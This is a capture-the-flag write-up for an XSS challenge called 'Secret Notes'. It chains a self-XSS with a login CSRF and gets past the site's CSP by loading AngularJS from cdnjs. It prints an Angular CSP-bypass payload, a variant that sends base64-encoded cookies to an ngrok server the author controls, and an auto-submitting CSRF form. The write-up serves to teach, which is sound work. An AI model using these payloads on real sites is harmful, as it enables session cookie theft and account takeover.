Secret Notes

Secret notes was an XSS challenge that consisted on a self xss that could be leveraged through csrf, it was also necessary to bypass CSP.

Approaching the app

The app has two main features, a notepad to which you login to and it links the note to your session, so whenever you login with the same user, you'll see the same note (this may sound obvious but it's kind of the catch here😉).

It's possible to login to the notepad using admin as username and password. Once logged in we receive a CSP header as follows:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' cdnjs.cloudflare.com maxcdn.bootstrapcdn.com; style-src maxcdn.bootstrapcdn.com 'self' 'unsafe-inline';

The app won't run simple xss payloads such as <script>alert()</script>, but it does accept anything from cdnjs, that means we could, for example, import angular.js and finaly be able to run javascript. There is an hacktricks article that makes this fairly easy to accomplish.

Content Security Policy (CSP) BypassHackTricks

Running the following payload will pop an alert:

</textarea><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert("csp bypass ez af");//');}} </div>

The second feature of the app allows you to input an url to which the admin will browse.

The app also doesn't have any CSRF protections at all. With all the info we've gathered, we could send an url that would take the admin to a CSRF payload that would send a login form to the app using the same credentials we did, so the admin will be redirected to our self xss payload.

The exploit

We could try exfiltrating cookies with a payload as follows.

</textarea><script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js'></script>
    <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };location=`http://d3e1fcf03b4e.ngrok.io/?xss=`+btoa(document.cookie);//');}}</div>

We set the location to a server we control and pass the cookies as a get parameter, this is basic data exfiltration via xss. After storing the xss payload in the notepad, we just need to get the admin to login. This can be done serving the following html form generated with burpsuite (Engagement tools > Generate CSRF POC):

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form id="form1" action="http://34.135.203.251/login" method="POST">

      <input type="hidden" name="username" value="admin" />

      <input type="hidden" name="password" value="admin" />

    </form>
    <script>
     document.getElementById("form1").submit();
    </script>

  </body>

</html>

Burp suite generates a PoC that requires user interaction, but it can be modded with javascript to run automatically. After sending the CSRF url to the admin, a cookie hits our server.

After decoding the base64 data, we get the flag 😛